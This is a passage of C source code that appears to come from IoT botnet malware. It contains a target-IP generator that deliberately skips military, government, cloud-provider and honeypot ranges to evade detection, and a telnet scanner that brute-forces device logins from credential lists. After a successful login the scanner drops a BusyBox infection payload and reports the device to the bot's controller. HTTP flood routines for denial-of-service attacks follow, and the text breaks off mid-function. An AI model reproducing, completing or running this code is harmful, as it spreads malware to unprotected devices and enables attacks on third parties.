while(bufferUsed + 2 < bufSize && (tv.tv_sec > 0 || tv.tv_usec > 0)) {
|
|
FD_ZERO(&myset);
|
|
FD_SET(fd, &myset);
|
|
if (select(fd+1, &myset, NULL, NULL, &tv) < 1) break;
|
|
initialRead = buffer + bufferUsed;
|
|
got = recv(fd, initialRead, 1, 0);
|
|
if(got == -1 || got == 0) return 0;
|
|
bufferUsed += got;
|
|
if(*initialRead == 0xFF) {
|
|
got = recv(fd, initialRead + 1, 2, 0);
|
|
if(got == -1 || got == 0) return 0;
|
|
bufferUsed += got;
|
|
if(!negotiate(fd, initialRead, 3)) return 0;
|
|
} else {
|
|
if(strstr(buffer, toFind) != NULL || (matchLePrompt && matchPrompt(buffer))) { found = 1; break; }
|
|
}
|
|
}
|
|
if(found) return 1;
|
|
return 0;
|
|
}
|
|
in_addr_t GIP() { //Like my ipstates?
|
|
static uint8_t ipState[4] = {0};
|
|
ipState[0] = rand() % 223;
|
|
ipState[1] = rand() % 255;
|
|
ipState[2] = rand() % 255;
|
|
ipState[3] = rand() % 255;
|
|
while(
|
|
(ipState[0] == 127) || //Loopback
|
|
(ipState[0] == 0) || //Invalid address space
|
|
(ipState[0] == 3) || //General Electric Company
|
|
(ipState[0] == 15) || //Hewlett-Packard Company
|
|
(ipState[0] == 56) || //US Postal Service
|
|
(ipState[0] == 10) || //Internal network
|
|
(ipState[0] == 25) || //Some more
|
|
(ipState[0] == 49) || //Some more
|
|
(ipState[0] == 50) || //Some more
|
|
(ipState[0] == 137) || //Some more
|
|
(ipState[0] == 6) || //Department of Defense
|
|
(ipState[0] == 7) || //Department of Defense
|
|
(ipState[0] == 11) || //Department of Defense
|
|
(ipState[0] == 21) || //Department of Defense
|
|
(ipState[0] == 22) || //Department of Defense
|
|
(ipState[0] == 26) || //Department of Defense
|
|
(ipState[0] == 28) || //Department of Defense
|
|
(ipState[0] == 29) || //Department of Defense
|
|
(ipState[0] == 30) || //Department of Defense
|
|
(ipState[0] == 33) || //Department of Defense
|
|
(ipState[0] == 55) || //Department of Defense
|
|
(ipState[0] == 214) || //Department of Defense
|
|
(ipState[0] == 215) || //Department of Defense
|
|
(ipState[0] == 192 && ipState[1] == 168) || //Internal network
|
|
(ipState[0] == 146 && ipState[1] == 17) || //Internal network
|
|
(ipState[0] == 146 && ipState[1] == 80) || //IANA NAT reserved
|
|
(ipState[0] == 146 && ipState[1] == 98) || //IANA NAT reserved
|
|
(ipState[0] == 146 && ipState[1] == 154) || //IANA Special use
|
|
(ipState[0] == 147 && ipState[1] == 159) || //Some more
|
|
(ipState[0] == 148 && ipState[1] == 114) || //Some more
|
|
(ipState[0] == 150 && ipState[1] == 125) || //Some more
|
|
(ipState[0] == 150 && ipState[1] == 133) || //Some more
|
|
(ipState[0] == 150 && ipState[1] == 144) || //Some more
|
|
(ipState[0] == 150 && ipState[1] == 149) || //Some more
|
|
(ipState[0] == 150 && ipState[1] == 157) || //Some more
|
|
(ipState[0] == 150 && ipState[1] == 184) || //Some more
|
|
(ipState[0] == 150 && ipState[1] == 190) || //Some more
|
|
(ipState[0] == 150 && ipState[1] == 196) || //Some more
|
|
(ipState[0] == 152 && ipState[1] == 82) || //Some more
|
|
(ipState[0] == 152 && ipState[1] == 229) || //Some more
|
|
(ipState[0] == 157 && ipState[1] == 202) || //Some more
|
|
(ipState[0] == 157 && ipState[1] == 217) || //Some more
|
|
(ipState[0] == 161 && ipState[1] == 124) || //Some more
|
|
(ipState[0] == 162 && ipState[1] == 32) || //Some more
|
|
(ipState[0] == 155 && ipState[1] == 96) || //Some more
|
|
(ipState[0] == 155 && ipState[1] == 149) || //Some more
|
|
(ipState[0] == 155 && ipState[1] == 155) || //Some more
|
|
(ipState[0] == 155 && ipState[1] == 178) || //Some more
|
|
(ipState[0] == 164 && ipState[1] == 158) || //Some more
|
|
(ipState[0] == 156 && ipState[1] == 9) || //Some more
|
|
(ipState[0] == 167 && ipState[1] == 44) || //Some more
|
|
(ipState[0] == 168 && ipState[1] == 68) || //Some more
|
|
(ipState[0] == 168 && ipState[1] == 85) || //Some more
|
|
(ipState[0] == 168 && ipState[1] == 102) || //Some more
|
|
(ipState[0] == 203 && ipState[1] == 59) || //Some more
|
|
(ipState[0] == 204 && ipState[1] == 34) || //Some more
|
|
(ipState[0] == 207 && ipState[1] == 30) || //Some more
|
|
(ipState[0] == 117 && ipState[1] == 55) || //Some more
|
|
(ipState[0] == 117 && ipState[1] == 56) || //Some more
|
|
(ipState[0] == 80 && ipState[1] == 235) || //Some more
|
|
(ipState[0] == 207 && ipState[1] == 120) || //Some more
|
|
(ipState[0] == 209 && ipState[1] == 35) || //Some more
|
|
(ipState[0] == 64 && ipState[1] == 70) || //Some more
|
|
(ipState[0] == 172 && ipState[1] >= 16 && ipState[1] < 32) || //Some more
|
|
(ipState[0] == 100 && ipState[1] >= 64 && ipState[1] < 127) || //Some more
|
|
(ipState[0] == 169 && ipState[1] == 254) || //Some more
|
|
(ipState[0] == 198 && ipState[1] >= 18 && ipState[1] < 20) || //Some more
|
|
(ipState[0] == 64 && ipState[1] >= 69 && ipState[1] < 227) || //Some more
|
|
(ipState[0] == 128 && ipState[1] >= 35 && ipState[1] < 237) || //Some more
|
|
(ipState[0] == 129 && ipState[1] >= 22 && ipState[1] < 255) || //Some more
|
|
(ipState[0] == 130 && ipState[1] >= 40 && ipState[1] < 168) || //Some more
|
|
(ipState[0] == 131 && ipState[1] >= 3 && ipState[1] < 251) || //Some more
|
|
(ipState[0] == 132 && ipState[1] >= 3 && ipState[1] < 251) || //Some more
|
|
(ipState[0] == 134 && ipState[1] >= 5 && ipState[1] < 235) || //Some more
|
|
(ipState[0] == 136 && ipState[1] >= 177 && ipState[1] < 223) || //Some more
|
|
(ipState[0] == 138 && ipState[1] >= 13 && ipState[1] < 194) || //Some more
|
|
(ipState[0] == 139 && ipState[1] >= 31 && ipState[1] < 143) || //Some more
|
|
(ipState[0] == 140 && ipState[1] >= 1 && ipState[1] < 203) || //Some more
|
|
(ipState[0] == 143 && ipState[1] >= 45 && ipState[1] < 233) || //Some more
|
|
(ipState[0] == 144 && ipState[1] >= 99 && ipState[1] < 253) || //Some more
|
|
(ipState[0] == 146 && ipState[1] >= 165 && ipState[1] < 166) || //Some more
|
|
(ipState[0] == 147 && ipState[1] >= 35 && ipState[1] < 43) || //Some more
|
|
(ipState[0] == 147 && ipState[1] >= 103 && ipState[1] < 105) || //Some more
|
|
(ipState[0] == 147 && ipState[1] >= 168 && ipState[1] < 170) || //Some more
|
|
(ipState[0] == 147 && ipState[1] >= 198 && ipState[1] < 200) || //Some more
|
|
(ipState[0] == 147 && ipState[1] >= 238 && ipState[1] < 255) || //Some more
|
|
(ipState[0] == 150 && ipState[1] >= 113 && ipState[1] < 115) || //Some more
|
|
(ipState[0] == 152 && ipState[1] >= 151 && ipState[1] < 155) || //Some more
|
|
(ipState[0] == 153 && ipState[1] >= 21 && ipState[1] < 32) || //Some more
|
|
(ipState[0] == 155 && ipState[1] >= 5 && ipState[1] < 10) || //Some more
|
|
(ipState[0] == 155 && ipState[1] >= 74 && ipState[1] < 89) || //Some more
|
|
(ipState[0] == 155 && ipState[1] >= 213 && ipState[1] < 222) || //Some more
|
|
(ipState[0] == 157 && ipState[1] >= 150 && ipState[1] < 154) || //Some more
|
|
(ipState[0] == 158 && ipState[1] >= 1 && ipState[1] < 21) || //Some more
|
|
(ipState[0] == 158 && ipState[1] >= 235 && ipState[1] < 247) || //Some more
|
|
(ipState[0] == 159 && ipState[1] >= 120 && ipState[1] < 121) || //Some more
|
|
(ipState[0] == 160 && ipState[1] >= 132 && ipState[1] < 151) || //Some more
|
|
(ipState[0] == 64 && ipState[1] >= 224 && ipState[1] < 227) || //Some more
|
|
(ipState[0] == 162 && ipState[1] >= 45 && ipState[1] < 47) || //CIA
|
|
(ipState[0] == 163 && ipState[1] >= 205 && ipState[1] < 207) || //NASA Kennedy Space Center
|
|
(ipState[0] == 164 && ipState[1] >= 45 && ipState[1] < 50) || //NASA Kennedy Space Center
|
|
(ipState[0] == 164 && ipState[1] >= 217 && ipState[1] < 233) || //NASA Kennedy Space Center
|
|
(ipState[0] == 169 && ipState[1] >= 252 && ipState[1] < 254) || //U.S. Department of State
|
|
(ipState[0] == 199 && ipState[1] >= 121 && ipState[1] < 254) || //Naval Air Systems Command, VA
|
|
(ipState[0] == 205 && ipState[1] >= 1 && ipState[1] < 118) || //Department of the Navy, Space and Naval Warfare System Command, Washington DC - SPAWAR
|
|
(ipState[0] == 207 && ipState[1] >= 60 && ipState[1] < 62) || //FBI controlled Linux servers & IPs/IP-Ranges
|
|
(ipState[0] == 104 && ipState[1] >= 16 && ipState[1] < 31) || //Cloudflare
|
|
(ipState[0] == 188 && ipState[1] == 166) || //Digital Ocean
|
|
(ipState[0] == 188 && ipState[1] == 226) || //Digital Ocean
|
|
(ipState[0] == 159 && ipState[1] == 203) || //Digital Ocean
|
|
(ipState[0] == 162 && ipState[1] == 243) || //Digital Ocean
|
|
(ipState[0] == 45 && ipState[1] == 55) || //Digital Ocean
|
|
(ipState[0] == 178 && ipState[1] == 62) || //Digital Ocean
|
|
(ipState[0] == 104 && ipState[1] == 131) || //Digital Ocean
|
|
(ipState[0] == 104 && ipState[1] == 236) || //Digital Ocean
|
|
(ipState[0] == 107 && ipState[1] == 170) || //Digital Ocean
|
|
(ipState[0] == 138 && ipState[1] == 197) || //Digital Ocean
|
|
(ipState[0] == 138 && ipState[1] == 68) || //Digital Ocean
|
|
(ipState[0] == 139 && ipState[1] == 59) || //Digital Ocean
|
|
(ipState[0] == 146 && ipState[1] == 185 && ipState[2] >= 128 && ipState[2] < 191) || //Digital Ocean
|
|
(ipState[0] == 163 && ipState[1] == 47 && ipState[2] >= 10 && ipState[2] < 11) || //Digital Ocean
|
|
(ipState[0] == 174 && ipState[1] == 138 && ipState[2] >= 1 && ipState[2] < 127) || //Digital Ocean
|
|
(ipState[0] == 192 && ipState[1] == 241 && ipState[2] >= 128 && ipState[2] < 255) || //Digital Ocean
|
|
(ipState[0] == 198 && ipState[1] == 199 && ipState[2] >= 64 && ipState[2] < 127) || //Digital Ocean
|
|
(ipState[0] == 198 && ipState[1] == 211 && ipState[2] >= 96 && ipState[2] < 127) || //Digital Ocean
|
|
(ipState[0] == 207 && ipState[1] == 154 && ipState[2] >= 192 && ipState[2] < 255) || //Digital Ocean
|
|
(ipState[0] == 37 && ipState[1] == 139 && ipState[2] >= 1 && ipState[2] < 31) || //Digital Ocean
|
|
(ipState[0] == 67 && ipState[1] == 207 && ipState[2] >= 64 && ipState[2] < 95) || //Digital Ocean
|
|
(ipState[0] == 67 && ipState[1] == 205 && ipState[2] >= 128 && ipState[2] < 191) || //Digital Ocean
|
|
(ipState[0] == 80 && ipState[1] == 240 && ipState[2] >= 128 && ipState[2] < 143) || //Digital Ocean
|
|
(ipState[0] == 82 && ipState[1] == 196 && ipState[2] >= 1 && ipState[2] < 15) || //Digital Ocean
|
|
(ipState[0] == 95 && ipState[1] == 85 && ipState[2] >= 8 && ipState[2] < 63) || //Digital Ocean
|
|
(ipState[0] == 64 && ipState[1] == 237 && ipState[2] >= 32 && ipState[2] < 43) || //Choopa & Vultr
|
|
(ipState[0] == 185 && ipState[1] == 92 && ipState[2] >= 220 && ipState[2] < 223) || //Choopa & Vultr
|
|
(ipState[0] == 104 && ipState[1] == 238 && ipState[2] >= 128 && ipState[2] < 191) || //Choopa & Vultr
|
|
(ipState[0] == 209 && ipState[1] == 222 && ipState[2] >= 1 && ipState[2] < 31) || //Choopa & Vultr
|
|
(ipState[0] == 208 && ipState[1] == 167 && ipState[2] >= 232 && ipState[2] < 252) || //Choopa & Vultr
|
|
(ipState[0] == 66 && ipState[1] == 55 && ipState[2] >= 128 && ipState[2] < 159) || //Choopa & Vultr
|
|
(ipState[0] == 45 && ipState[1] == 63 && ipState[2] >= 1 && ipState[2] < 127) || //Choopa & Vultr
|
|
(ipState[0] == 216 && ipState[1] == 237 && ipState[2] >= 128 && ipState[2] < 159) || //Choopa & Vultr
|
|
(ipState[0] == 108 && ipState[1] == 61) || //Choopa & Vultr
|
|
(ipState[0] == 45 && ipState[1] == 76) || //Choopa & Vultr
|
|
(ipState[0] == 185 && ipState[1] == 11 && ipState[2] >= 144 && ipState[2] < 148) || //Blazingfast & Nforce
|
|
(ipState[0] == 185 && ipState[1] == 56 && ipState[2] >= 21 && ipState[2] < 23) || //Blazingfast & Nforce
|
|
(ipState[0] == 185 && ipState[1] == 61 && ipState[2] >= 136 && ipState[2] < 139) || //Blazingfast & Nforce
|
|
(ipState[0] == 185 && ipState[1] == 62 && ipState[2] >= 187 && ipState[2] < 191) || //Blazingfast & Nforce
|
|
(ipState[0] == 66 && ipState[1] == 150 && ipState[2] >= 120 && ipState[2] < 215) || //Blazingfast & Nforce
|
|
(ipState[0] == 66 && ipState[1] == 151 && ipState[2] >= 137 && ipState[2] < 139) || //Blazingfast & Nforce
|
|
(ipState[0] == 64 && ipState[1] == 94 && ipState[2] >= 237 && ipState[2] < 255) || //Blazingfast & Nforce
|
|
(ipState[0] == 63 && ipState[1] == 251 && ipState[2] >= 19 && ipState[2] < 21) || //Blazingfast & Nforce
|
|
(ipState[0] == 70 && ipState[1] == 42 && ipState[2] >= 73 && ipState[2] < 75) || //Blazingfast & Nforce
|
|
(ipState[0] == 74 && ipState[1] == 91 && ipState[2] >= 113 && ipState[2] < 115) || //Blazingfast & Nforce
|
|
(ipState[0] == 74 && ipState[1] == 201 && ipState[2] >= 56 && ipState[2] < 58) || //Blazingfast & Nforce
|
|
(ipState[0] == 188 && ipState[1] == 209 && ipState[2] >= 48 && ipState[2] < 53) || //Blazingfast & Nforce
|
|
(ipState[0] == 188 && ipState[1] == 165) || //OVH
|
|
(ipState[0] == 149 && ipState[1] == 202) || //OVH
|
|
(ipState[0] == 151 && ipState[1] == 80) || //OVH
|
|
(ipState[0] == 164 && ipState[1] == 132) || //OVH
|
|
(ipState[0] == 176 && ipState[1] == 31) || //OVH
|
|
(ipState[0] == 167 && ipState[1] == 114) || //OVH
|
|
(ipState[0] == 178 && ipState[1] == 32) || //OVH
|
|
(ipState[0] == 178 && ipState[1] == 33) || //OVH
|
|
(ipState[0] == 37 && ipState[1] == 59) || //OVH
|
|
(ipState[0] == 37 && ipState[1] == 187) || //OVH
|
|
(ipState[0] == 46 && ipState[1] == 105) || //OVH
|
|
(ipState[0] == 51 && ipState[1] == 254) || //OVH
|
|
(ipState[0] == 51 && ipState[1] == 255) || //OVH
|
|
(ipState[0] == 5 && ipState[1] == 135) || //OVH
|
|
(ipState[0] == 5 && ipState[1] == 196) || //OVH
|
|
(ipState[0] == 5 && ipState[1] == 39) || //OVH
|
|
(ipState[0] == 91 && ipState[1] == 134) || //OVH
|
|
(ipState[0] == 104 && ipState[1] == 200 && ipState[2] >= 128 && ipState[2] < 159) || //Total Server Solutions
|
|
(ipState[0] == 107 && ipState[1] == 152 && ipState[2] >= 96 && ipState[2] < 111) || //Total Server Solutions
|
|
(ipState[0] == 107 && ipState[1] == 181 && ipState[2] >= 160 && ipState[2] < 189) || //Total Server Solutions
|
|
(ipState[0] == 172 && ipState[1] == 98 && ipState[2] >= 64 && ipState[2] < 95) || //Total Server Solutions
|
|
(ipState[0] == 184 && ipState[1] == 170 && ipState[2] >= 240 && ipState[2] < 255) || //Total Server Solutions
|
|
(ipState[0] == 192 && ipState[1] == 111 && ipState[2] >= 128 && ipState[2] < 143) || //Total Server Solutions
|
|
(ipState[0] == 192 && ipState[1] == 252 && ipState[2] >= 208 && ipState[2] < 223) || //Total Server Solutions
|
|
(ipState[0] == 192 && ipState[1] == 40 && ipState[2] >= 56 && ipState[2] < 59) || //Total Server Solutions
|
|
(ipState[0] == 198 && ipState[1] == 8 && ipState[2] >= 81 && ipState[2] < 95) || //Total Server Solutions
|
|
(ipState[0] == 199 && ipState[1] == 116 && ipState[2] >= 112 && ipState[2] < 119) || //Total Server Solutions
|
|
(ipState[0] == 199 && ipState[1] == 229 && ipState[2] >= 248 && ipState[2] < 255) || //Total Server Solutions
|
|
(ipState[0] == 199 && ipState[1] == 36 && ipState[2] >= 220 && ipState[2] < 223) || //Total Server Solutions
|
|
(ipState[0] == 199 && ipState[1] == 58 && ipState[2] >= 184 && ipState[2] < 187) || //Total Server Solutions
|
|
(ipState[0] == 206 && ipState[1] == 220 && ipState[2] >= 172 && ipState[2] < 175) || //Total Server Solutions
|
|
(ipState[0] == 208 && ipState[1] == 78 && ipState[2] >= 40 && ipState[2] < 43) || //Total Server Solutions
|
|
(ipState[0] == 208 && ipState[1] == 93 && ipState[2] >= 192 && ipState[2] < 193) || //Total Server Solutions
|
|
(ipState[0] == 66 && ipState[1] == 71 && ipState[2] >= 240 && ipState[2] < 255) || //Total Server Solutions
|
|
(ipState[0] == 98 && ipState[1] == 142 && ipState[2] >= 208 && ipState[2] < 223) || //Total Server Solutions
|
|
(ipState[0] == 107 && ipState[1] >= 20 && ipState[1] < 24) || //Amazon
|
|
(ipState[0] == 35 && ipState[1] >= 159 && ipState[1] < 183) || //Amazon
|
|
(ipState[0] == 52 && ipState[1] >= 1 && ipState[1] < 95) || //Amazon
|
|
(ipState[0] == 52 && ipState[1] >= 95 && ipState[1] < 255) || //Amazon + Microsoft
|
|
(ipState[0] == 54 && ipState[1] >= 64 && ipState[1] < 95) || //Amazon + Microsoft
|
|
(ipState[0] == 54 && ipState[1] >= 144 && ipState[1] < 255) || //Amazon + Microsoft
|
|
(ipState[0] == 13 && ipState[1] >= 52 && ipState[1] < 60) || //Amazon + Microsoft
|
|
(ipState[0] == 13 && ipState[1] >= 112 && ipState[1] < 115) || //Amazon + Microsoft
|
|
(ipState[0] == 163 && ipState[1] == 172) || //ONLINE SAS
|
|
(ipState[0] == 51 && ipState[1] >= 15 && ipState[1] < 255) || //ONLINE SAS
|
|
(ipState[0] == 79 && ipState[1] == 121 && ipState[2] >= 128 && ipState[2] < 255) || //Some more
|
|
(ipState[0] == 212 && ipState[1] == 47 && ipState[2] >= 224 && ipState[2] < 255) || //Some more
|
|
(ipState[0] == 89 && ipState[1] == 34 && ipState[2] >= 96 && ipState[2] < 97) || //Some more
|
|
(ipState[0] == 219 && ipState[1] >= 216 && ipState[1] < 231) || //Some more
|
|
(ipState[0] == 23 && ipState[1] >= 94 && ipState[1] < 109) || //Some more
|
|
(ipState[0] == 178 && ipState[1] >= 62 && ipState[1] < 63) || //Some more
|
|
(ipState[0] == 106 && ipState[1] >= 182 && ipState[1] < 189) || //Some more
|
|
(ipState[0] == 106 && ipState[1] >= 184) || //Some more
|
|
(ipState[0] == 106 && ipState[1] == 105) || //Honeypot
|
|
(ipState[0] == 34 && ipState[1] >= 245 && ipState[1] < 255) || //Some more
|
|
(ipState[0] == 87 && ipState[1] >= 97 && ipState[1] < 99) || //Some more
|
|
(ipState[0] == 86 && ipState[1] == 208) || //Some more
|
|
(ipState[0] == 86 && ipState[1] == 209) || //Some more
|
|
(ipState[0] == 193 && ipState[1] == 164) || //Some more
|
|
(ipState[0] == 120 && ipState[1] >= 103 && ipState[1] < 108) || //Ministry of Education Computer Science
|
|
(ipState[0] == 188 && ipState[1] == 68) || //Ministry of Education Computer Science
|
|
(ipState[0] == 78 && ipState[1] == 46) || //Ministry of Education Computer Science
|
|
(ipState[0] == 224)) { //Multicast
|
|
ipState[0] = rand() % 223;
|
|
ipState[1] = rand() % 255;
|
|
ipState[2] = rand() % 255;
|
|
ipState[3] = rand() % 255;
|
|
}
|
|
char ip[16] = {0};
|
|
szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
|
|
return inet_addr(ip);
|
|
}
|
|
in_addr_t GRIP(in_addr_t netmask) {
|
|
in_addr_t tmp = ntohl(ourIP.s_addr) & netmask;
|
|
return tmp ^ ( rand_cmwc() & ~netmask);
|
|
}
|
|
int socket_connect(char *host, in_port_t port) {
|
|
struct hostent *hp;
|
|
struct sockaddr_in addr;
|
|
int on = 1, sock;
|
|
if ((hp = gethostbyname(host)) == NULL) return 0;
|
|
bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
|
|
addr.sin_port = htons(port);
|
|
addr.sin_family = AF_INET;
|
|
sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
|
|
setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int));
|
|
if (sock == -1) return 0;
|
|
if (connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1)
|
|
return 0;
|
|
return sock;
|
|
}
|
|
void botnetTScan(int wait_usec, int maxfds) {
|
|
int i, res, num_tmps, j;
|
|
char buf[128], cur_dir;
|
|
int max = maxfds;
|
|
fd_set fdset;
|
|
struct timeval tv;
|
|
socklen_t lon;
|
|
int valopt;
|
|
srand(time(NULL) ^ rand_cmwc());
|
|
char line[256];
|
|
char* buffer;
|
|
struct sockaddr_in dest_addr;
|
|
dest_addr.sin_family = AF_INET;
|
|
dest_addr.sin_port = htons(23);
|
|
memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
|
|
buffer = malloc(BUFFER_SIZE + 1);
|
|
memset(buffer, 0, BUFFER_SIZE + 1);
|
|
struct telstate_t fds[max];
|
|
memset(fds, 0, max * (sizeof(int) + 1));
|
|
for(i = 0; i < max; i++) {
|
|
memset(&(fds[i]), 0, sizeof(struct telstate_t));
|
|
fds[i].complete = 1;
|
|
fds[i].sockbuf = buffer;
|
|
}
|
|
for(num_tmps = 0; tmpdirs[++num_tmps] != 0; );
|
|
while(1) {
|
|
for(i = 0; i < max; i++) {
|
|
if(fds[i].totalTimeout == 0) {
|
|
fds[i].totalTimeout = time(NULL);
|
|
}
|
|
switch(fds[i].state) {
|
|
case 0: {
|
|
if(fds[i].complete == 1) {
|
|
char *tmp = fds[i].sockbuf;
|
|
memset(&(fds[i]), 0, sizeof(struct telstate_t));
|
|
fds[i].sockbuf = tmp;
|
|
fds[i].ip = GIP();
|
|
}
|
|
else if(fds[i].complete == 0) {
|
|
fds[i].passwordInd++;
|
|
fds[i].usernameInd++;
|
|
if(fds[i].passwordInd == sizeof(passwords) / sizeof(char *)) {
|
|
fds[i].complete = 1;
|
|
continue;
|
|
}
|
|
if(fds[i].usernameInd == sizeof(usernames) / sizeof(char *)) {
|
|
fds[i].complete = 1;
|
|
continue;
|
|
}
|
|
}
|
|
dest_addr.sin_family = AF_INET;
|
|
dest_addr.sin_port = htons(23);
|
|
memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
|
|
dest_addr.sin_addr.s_addr = fds[i].ip;
|
|
fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
|
|
if(fds[i].fd == -1) continue;
|
|
fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
|
|
if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) {
|
|
reset_telstate(&fds[i]);
|
|
} else {
|
|
advance_state(&fds[i], 1);
|
|
}
|
|
}
|
|
break;
|
|
case 1: {
|
|
FD_ZERO(&fdset);
|
|
FD_SET(fds[i].fd, &fdset);
|
|
tv.tv_sec = 0;
|
|
tv.tv_usec = wait_usec;
|
|
res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
|
|
if(res == 1) {
|
|
lon = sizeof(int);
|
|
valopt = 0;
|
|
getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
|
|
if(valopt) {
|
|
reset_telstate(&fds[i]);
|
|
} else {
|
|
fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
|
|
advance_state(&fds[i], 2);
|
|
}
|
|
continue;
|
|
}
|
|
else if(res == -1) {
|
|
reset_telstate(&fds[i]);
|
|
continue;
|
|
}
|
|
if(fds[i].totalTimeout + 5 < time(NULL)) {
|
|
reset_telstate(&fds[i]);
|
|
}
|
|
}
|
|
break;
|
|
case 2: {
|
|
if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, advances)) {
|
|
if(contains_fail(fds[i].sockbuf)) {
|
|
advance_state(&fds[i], 0);
|
|
} else {
|
|
advance_state(&fds[i], 3);
|
|
}
|
|
continue;
|
|
}
|
|
if(fds[i].totalTimeout + 7 < time(NULL)) {
|
|
reset_telstate(&fds[i]);
|
|
}
|
|
}
|
|
break;
|
|
case 3: {
|
|
if(send(fds[i].fd, usernames[fds[i].usernameInd], strlen(usernames[fds[i].usernameInd]), MSG_NOSIGNAL) < 0) {
|
|
reset_telstate(&fds[i]);
|
|
continue;
|
|
}
|
|
if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) {
|
|
reset_telstate(&fds[i]);
|
|
continue;
|
|
}
|
|
advance_state(&fds[i], 4);
|
|
}
|
|
break;
|
|
case 4: {
|
|
if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, advances)) {
|
|
if(contains_fail(fds[i].sockbuf)) {
|
|
advance_state(&fds[i], 0);
|
|
} else {
|
|
advance_state(&fds[i], 5);
|
|
}
|
|
continue;
|
|
}
|
|
if(fds[i].totalTimeout + 3 < time(NULL)) {
|
|
reset_telstate(&fds[i]);
|
|
}
|
|
}
|
|
break;
|
|
case 5: {
|
|
if(send(fds[i].fd, passwords[fds[i].passwordInd], strlen(passwords[fds[i].passwordInd]), MSG_NOSIGNAL) < 0) {
|
|
reset_telstate(&fds[i]);
|
|
continue;
|
|
}
|
|
if(send(fds[i].fd, "\r\n", 2, MSG_NOSIGNAL) < 0) {
|
|
reset_telstate(&fds[i]);
|
|
continue;
|
|
}
|
|
advance_state(&fds[i], 6);
|
|
}
|
|
break;
|
|
case 6: {
|
|
if(read_until_response(fds[i].fd, wait_usec, fds[i].sockbuf, BUFFER_SIZE, advances2)) {
|
|
fds[i].totalTimeout = time(NULL);
|
|
if(contains_fail(fds[i].sockbuf)) {
|
|
advance_state(&fds[i], 0);
|
|
}
|
|
else if(contains_success(fds[i].sockbuf)) {
|
|
if(fds[i].complete == 2) {
|
|
advance_state(&fds[i], 7);
|
|
} else {
|
|
botnetPrint(KadenCommStock, "Eragon Bruted -> %s [ %s:%s ]", get_telstate_host(&fds[i]), usernames[fds[i].usernameInd], passwords[fds[i].passwordInd]);
|
|
advance_state(&fds[i], 7);
|
|
}
|
|
} else {
|
|
reset_telstate(&fds[i]);
|
|
}
|
|
continue;
|
|
}
|
|
if(fds[i].totalTimeout + 7 < time(NULL)) {
|
|
reset_telstate(&fds[i]);
|
|
}
|
|
}
|
|
break;
|
|
case 7: {
|
|
fds[i].totalTimeout = time(NULL);
|
|
if(send(fds[i].fd, "sh\r\n", 4, MSG_NOSIGNAL) <0);
|
|
if(send(fds[i].fd, "shell\r\n", 7, MSG_NOSIGNAL) < 0);
|
|
if(send(fds[i].fd, BusyBoxPayload, strlen(BusyBoxPayload), MSG_NOSIGNAL) < 0) {
|
|
reset_telstate(&fds[i]);
|
|
continue;
|
|
}
|
|
if(fds[i].totalTimeout + 25 < time(NULL)) {
|
|
if(fds[i].complete !=3){
|
|
}
|
|
reset_telstate(&fds[i]);
|
|
}
|
|
break;
|
|
}
|
|
}
|
|
}
|
|
}
|
|
}
|
|
void makeRandomStr(unsigned char *buf, int length) {
|
|
int i = 0;
|
|
for(i = 0; i < length; i++) buf[i] = (rand_cmwc()%(91-65))+65;
|
|
}
|
|
unsigned short csum (unsigned short *buf, int count) {
|
|
register uint64_t sum = 0;
|
|
while( count > 1 ) { sum += *buf++; count -= 2; }
|
|
if(count > 0) { sum += *(unsigned char *)buf; }
|
|
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
|
return (uint16_t)(~sum);
|
|
}
|
|
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
|
struct tcp_pseudo {
|
|
unsigned long src_addr;
|
|
unsigned long dst_addr;
|
|
unsigned char zero;
|
|
unsigned char proto;
|
|
unsigned short length;
|
|
} pseudohead;
|
|
unsigned short total_len = iph->tot_len;
|
|
pseudohead.src_addr=iph->saddr;
|
|
pseudohead.dst_addr=iph->daddr;
|
|
pseudohead.zero=0;
|
|
pseudohead.proto=IPPROTO_TCP;
|
|
pseudohead.length=htons(sizeof(struct tcphdr));
|
|
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
|
unsigned short *tcp = malloc(totaltcp_len);
|
|
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
|
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
|
unsigned short output = csum(tcp,totaltcp_len);
|
|
free(tcp);
|
|
return output;
|
|
}
|
|
void SendHTTP(char *method, char *host, in_port_t port, char *path, int timeEnd, int power) {
|
|
int socket, i, end = time(NULL) + timeEnd, sendIP = 0;
|
|
char request[512], buffer[1];
|
|
for (i = 0; i < power; i++) {
|
|
sprintf(request, "%s %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\n\r\n", method, path, host, useragents[(rand() % 36)]);
|
|
if (fork()) {
|
|
while (end > time(NULL)) {
|
|
socket = socket_connect(host, port);
|
|
if (socket != 0) {
|
|
write(socket, request, strlen(request));
|
|
read(socket, buffer, 1);
|
|
close(socket);
|
|
}
|
|
}
|
|
exit(0);
|
|
}
|
|
}
|
|
}
|
|
|
|
void SendHTTPHex(char *method, char *host, in_port_t port, char *path, int timeEnd, int power) {
|
|
int socket, i, end = time(NULL) + timeEnd, sendIP = 0;
|
|
